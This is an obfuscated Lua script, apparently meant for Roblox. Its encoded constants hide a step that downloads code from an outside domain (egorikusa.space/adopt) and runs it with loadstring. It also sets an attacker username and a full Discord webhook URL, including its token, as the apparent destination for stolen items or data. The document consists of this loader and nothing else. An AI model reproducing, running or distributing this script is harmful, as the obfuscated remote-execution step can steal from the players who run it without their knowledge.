--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v84=0;while true do if (v84==0) then v19=v0(v3(v30,1,1));return "";end end else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v30,16));if v19 then local v124=0;local v125;while true do if (1==v124) then return v125;end if (v124==0) then v125=v5(v86,v19);v19=nil;v124=1;end end else return v86;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v87=0;local v88;while true do if (v87==(0 -(1637 -(1523 + 114)))) then v88=(v31/(2^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v88-(v88%(932 -(857 + 74))) ;end end else local v89=0;local v90;while true do if (v89==((511 + 57) -(367 + 201))) then v90=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v90 + v90))>=v90) and (1 + 0)) or (877 -((401 -119) + 595)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (12 -9) );v18=v18 + (121 -(32 + 85)) ;return (v40 * (16441815 + 335401)) + (v39 * 65536) + (v38 * ((1014 -(892 + 65)) + 199)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,2 -(2 -1) ,36 -16 ) * ((3 -1)^(382 -(87 + 263)))) + v41 ;local v45=v20(v42,201 -(67 + 113) ,23 + 8 );local v46=((v20(v42,32)==((3 -1) -1)) and  -1) or (1 + 0) ;if (v45==(0 -0)) then if (v44==(952 -(802 + 150))) then return v46 * (0 -0) ;else v45=1;v43=0;end elseif (v45==(3712 -1665)) then return ((v44==(0 + 0 + 0)) and (v46 * ((998 -(915 + 82))/((0 -0) -0)))) or (v46 * NaN) ;end return v8(v46,v45-(592 + 4 + 427) ) * (v43 + (v44/((2 -0)^(1239 -((1860 -(368 + 423)) + (370 -252)))))) ;end local function v25(v47) local v48=18 -(10 + 8) ;local v49;local v50;while true do if (v48==(7 -5)) then v50={};for v109=443 -(416 + 26) , #v49 do v50[v109]=v2(v1(v3(v49,v109,v109)));end v48=3 + 0 ;end if ((3 -2)==v48) then v49=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;v48=3 -1 ;end if ((438 -(145 + 293))==v48) then v49=nil;if  not v47 then v47=v23();if (v47==((1202 -(201 + 571)) -(44 + 386))) then return "";end end v48=1487 -(998 + 488) ;end if (v48==(1 + 2)) then return v6(v50);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0 + 0 ;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91==(0 -0)) then local v115=(function() return 0 -0 ;end)();local v116=(function() return;end)();while true do if (v115==(0 -0)) then v116=(function() return 0 + 0 ;end)();while true do if (v116==1) then v91=(function() return  #"!";end)();break;end if (v116~=(0 -0)) then else v92=(function() return v93();end)();v94=(function() return nil;end)();v116=(function() return 699 -(208 + 490) ;end)();end end break;end end end if (v91~= #">") then else if (v92== #":") then v94=(function() return v93()~=(0 + 0) ;end)();elseif (v92==2) then v94=(function() return v95();end)();elseif (v92== #"91(") then v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v52=(function() return function(v99,v100,v101) local v102=(function() return 0 + 0 ;end)();while true do if (v102==(836 -(660 + 176))) then local v118=(function() return 0 -0 ;end)();while true do if (v118~=0) then else v99[v100-#"}" ]=(function() return v101();end)();return v99,v100,v101;end end end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v66= #",",v57 do FlatIdent_946F,Type,v21,Cons,v24,v25,v58,v66=(function() return v51(FlatIdent_946F,Type,v21,Cons,v24,v25,v58,v66);end)();end v56[ #"91("]=(function() return v21();end)();for v67= #"<",v23() do local v68=(function() return v21();end)();if (v20(v68, #"~", #"}")==(675 -(534 + 141))) then local v105=(function() return 0 + 0 ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v105==(1474 -(1329 + 145))) then local v121=(function() return 0;end)();while true do if (v121~=(971 -(140 + 831))) then else v106=(function() return v20(v68,2, #"19(");end)();v107=(function() return v20(v68, #"asd1",6 + 0 );end)();v121=(function() return 1851 -(1409 + 441) ;end)();end if (v121~=(1 -0)) then else v105=(function() return 719 -(15 + 703) ;end)();break;end end end if ((4 -1)~=v105) then else if (v20(v107, #"asd", #"gha")~= #"~") then else v108[ #".dev"]=(function() return v58[v108[ #"xnxx"]];end)();end v53[v67]=(function() return v108;end)();break;end if (v105==(1 + 0)) then local v123=(function() return 438 -(262 + 176) ;end)();while true do if (v123~=(1721 -(345 + 1376))) then else v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==(0 + 0)) then local v130=(function() return 0;end)();while true do if (v130==(396 -(115 + 281))) then v108[ #"xxx"]=(function() return v22();end)();v108[ #"0313"]=(function() return v22();end)();break;end end elseif (v106== #"[") then v108[ #"gha"]=(function() return v23();end)();elseif (v106==(690 -(198 + 490))) then v108[ #"91("]=(function() return v23() -((2 + 0)^(70 -54)) ;end)();elseif (v106== #"91(") then local v179=(function() return 0;end)();local v180=(function() return;end)();while true do if (0~=v179) then else v180=(function() return 0;end)();while true do if (v180==(0 -0)) then v108[ #"xxx"]=(function() return v23() -((1208 -(696 + 510))^16) ;end)();v108[ #"0313"]=(function() return v22();end)();break;end end break;end end end v123=(function() return 1 -0 ;end)();end if (1~=v123) then else v105=(function() return 1264 -(1091 + 171) ;end)();break;end end end if (v105==(2 -0)) then if (v20(v107, #"\\", #"\\")== #"!") then v108[5 -3 ]=(function() return v58[v108[287 -(134 + 151) ]];end)();end if (v20(v107,2,1667 -(970 + 695) )== #",") then v108[ #"asd"]=(function() return v58[v108[ #"-19"]];end)();end v105=(function() return 3;end)();end end end end for v69= #"|",v23() do v54,v69,v28=(function() return v52(v54,v69,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 -0 ];local v64=v60[1992 -(582 + 1408) ];local v65=v60[3];return function(...) local v70=v63;local v71=v64;local v72=v65;local v73=v27;local v74=3 -(3 -1) ;local v75= -(1 -0);local v76={};local v77={...};local v78=v12("#",...) -((240 -(64 + 174)) -1) ;local v79={};local v80={};for v103=1824 -(1195 + 629) ,v78 do if ((4029<=4853) and (v103>=v72)) then v76[v103-v72 ]=v77[v103 + (1 -0) ];else v80[v103]=v77[v103 + (3 -(1 + 1)) ];end end local v81=(v78-v72) + (242 -(187 + 54)) ;local v82;local v83;while true do local v104=780 -((239 -77) + 618) ;while true do if (v104==(1 + 0)) then if (v83<=(7 + 3)) then if ((v83<=(8 -4)) or (516>3434)) then if ((4046>=3033) and (v83<=(1 -(336 -(144 + 192))))) then if (v83==((216 -(42 + 174)) + 0)) then do return;end else local v132=v82[1638 -(1373 + 263) ];local v133=v80[v82[(947 + 313) -(1043 + 214) ]];v80[v132 + (3 -(2 + 0)) ]=v133;v80[v132]=v133[v82[1004 -(451 + 549) ]];end elseif (v83<=(1 + 1 + 0)) then v62[v82[4 -1 ]]=v80[v82[2 -0 ]];elseif (v83>(1387 -(746 + 638))) then v74=v82[2 + 1 ];else local v157=v82[2 -0 ];local v158,v159=v73(v80[v157](v13(v80,v157 + (342 -(218 + 123)) ,v82[(1505 -(363 + 1141)) + 2 ])));v75=(v159 + v157) -(414 -(15 + 398)) ;local v160=1581 -(1535 + 46) ;for v173=v157,v75 do local v174=(2562 -(1183 + 397)) -(18 + 964) ;while true do if (v174==0) then v160=v160 + 1 + 0 ;v80[v173]=v158[v160];break;end end end end elseif ((v83<=((5 -3) + 5)) or (2719<=1447)) then if (v83<=(565 -(306 + 254))) then v80[v82[1 + 1 + 0 ]]();elseif ((v83==(3 + 1 + 2)) or (4134<3926)) then v62[v82[5 -2 ]]=v80[v82[1469 -(899 + 568) ]];else for v175=v82[2 + 0 ],v82[3 + (1975 -(1913 + 62)) ] do v80[v175]=nil;end end elseif ((v83<=8) or (164>=2785)) then v74=v82[129 -(116 + 10) ];elseif (v83>(21 -12)) then local v163=603 -(268 + 335) ;local v164;local v165;while true do if ((v163==(290 -(60 + 230))) or (525==2109)) then v164=v82[574 -(426 + 146) ];v165=v80[v82[1 + 2 ]];v163=1457 -(282 + 1174) ;end if (v163==(812 -(569 + 242))) then v80[v164 + (2 -1) ]=v165;v80[v164]=v165[v82[2 + 2 ]];break;end end elseif ((33==33) and (v80[v82[1 + 1 ]]==v82[1028 -(706 + 318) ])) then v74=v74 + ((789 + 463) -(721 + (1403 -873))) ;else v74=v82[3];end elseif (v83<=(1566 -(1126 + 425))) then if (v83<=((3216 -(565 + 1368)) -(945 + 326))) then if (v83==(416 -((443 -325) + 287))) then local v140=v82[4 -2 ];local v141,v142=v73(v80[v140](v13(v80,v140 + (1662 -(1477 + 184)) + 0 ,v82[703 -(271 + 429) ])));v75=(v142 + v140) -(378 -(142 + 235)) ;local v143=(0 -0) + 0 + 0 ;for v152=v140,v75 do v143=v143 + (1501 -(1408 + 92)) ;v80[v152]=v141[v143];end else v80[v82[2]]=v62[v82[1089 -(461 + 625) ]];end elseif (v83<=(990 -((1409 -(564 + 292)) + 424))) then v80[v82[1290 -(993 + 295) ]]=v82[3 + 0 ];elseif ((3054<=4015) and (v83>(1 + 13))) then local v166=v82[1173 -(418 + 753) ];v80[v166]=v80[v166](v13(v80,v166 + 1 + 0 ,v75));else v80[v82[1 + (1 -0) ]]=v62[v82[1 + 2 ]];end elseif (v83<=(5 + 13)) then if (v83<=(545 -(406 + (370 -247)))) then v80[v82[1771 -(1749 + 20) ]]=v82[(305 -(244 + 60)) + 2 ];elseif (v83==(82 -65)) then do return;end else for v177=v82[1324 -(1249 + 73) ],v82[2 + 1 + 0 ] do v80[v177]=nil;end end elseif (v83<=(7 + 12)) then if ((1871<3382) and (v80[v82[1147 -(466 + (1155 -(41 + 435))) ]]==v82[3 + 1 ])) then v74=v74 + (2 -1) ;else v74=v82[(1003 -(938 + 63)) + 1 ];end elseif (v83>(57 -37)) then v80[v82[2]]();else local v171=v82[1902 -(106 + 1794) ];v80[v171]=v80[v171](v13(v80,v171 + 1 + 0 ,v75));end v74=v74 + 1 + 0 + 0 ;break;end if (v104==(0 -0)) then v82=v70[v74];v83=v82[2 -1 ];v104=115 -(4 + 110) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031D3O00682O7470733A2O2F65676F72696B7573612E73706163652F61646F707403083O00557365726E616D65030F3O00647261676F6E736C6963657232313303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313236393138393336313537323930393037362F4E6368784339324F50686F416476724E46375032764359395A387A4D674346787167387A3241584752587742616E4F6E3577694D6B37627967654366774376714A55484D001A3O00120D3O00014O0007000100013O0026093O000200010001002O043O0002000100120D000100013O0026090001000F00010002002O043O000F000100120E000200033O00120E000300043O00200100030003000500120D000500064O000B000300054O000F00023O00022O0005000200010001002O043O001900010026090001000500010001002O043O0005000100120D000200083O001206000200073O00120D0002000A3O001206000200093O00120D000100023O002O043O00050001002O043O00190001002O043O000200012O00113O00017O00",v9(),...);
